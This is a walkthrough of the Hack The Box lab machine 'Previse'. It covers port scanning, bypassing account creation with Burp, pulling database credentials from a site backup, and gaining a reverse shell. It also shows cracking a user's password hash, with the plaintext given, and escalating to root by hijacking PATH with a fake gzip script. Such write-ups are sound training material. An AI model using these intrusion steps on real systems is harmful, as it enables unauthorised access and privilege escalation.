HTB Previse
This write or walkthrough is for those who are facing issues while completing the challenge. It`s okay to go through walkthroughs and writeups if you are stuck somewhere is between. You will only learn something new which you might have overlooked. I m not gonna explain every command I use (I assume at this point you are familiar with basic commands and their attributes)
First, add the DNS or IP address to your /etc/hosts file.
One of the most classic step which everyone do is running a port scan using Nmap. It is the initial phase of Information Gathering.
#nmap -sS -sC -sV -A -T4 -Pn 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–10 17:19 GMT
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 54045/tcp)
HOP RTT ADDRESS
1 323.97 ms 10.10.14.1
2 324.16 ms previse.htb (10.10.11.104)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.49 seconds.
Now moving ahead with Gobuster. You can also use dirb, dirsearch, wfuzz, etc.
Moving on further with nav.php in order to create an account intercept the request using BurpSuite.
Now intercepting & modifying the request of accounts.php using Burpsuite.
After creating an account, navigate to login.php and login in to the web page. After logging in navigate to files.php & download the SITEBACKUP.ZIP extract it and open and see the credentials of MySQL.
Now for getting the Reverse Shell navigate to file_logs.php and intercept the request after clicking the Submit button.
Before clicking on forward request, do not forget to turn on the listener using command: nc -nlvp 4444
Since the listener was not persistent in order ot make it stable I used the command : python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now, connect to the MySQL DB. For this purpose I used the command : mysql -u root -D previse -p . You already have the credentials which you have extracted from SITEBACKUP.ZIP in the config.php file. Now use some basic SQL commands to get the password of the user m4lwhere in hash format.
Now focus on the image between the hash. Try some googling and convert the image into hash format.
User : m4lwhere
password-hash : $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
HINT (≡ƒºé = 🧂)
For bruteforcing the password I have used Hashcat . You can also use JTR or Medusa. I have used my custom wordlist you can also use rockyou.txt or other wordlist from SecLists. Command for JTR is : sudo john -format-md5crypt-long — wordlist=/root/wordlist.txt pass.hash
So the password which we get is ilovecody112235! . Now directly login to the machine using ssh . Grab the user.txt .
Now moving forward with the privilege escalation part. Run the sudo -l command to see which files or scripts can be run by user as root.
After concatenating the access_backup.sh, it is suggesting that running gzip file would help us in getting somewhere. So I changed my directory to /tmp and check the contents of the directory. Now we will create our own script for reverse tcp connection and start listening on the port. After creating the script as gzip give the executable permission as chmod 777 gzip and export the path as /tmp by using export PATH=$(pwd):$PATH now run the access_backup.sh it.
Note : Its important to be INSIDE /tmp as the path means to search for an executable in the current directory of user executing the program.
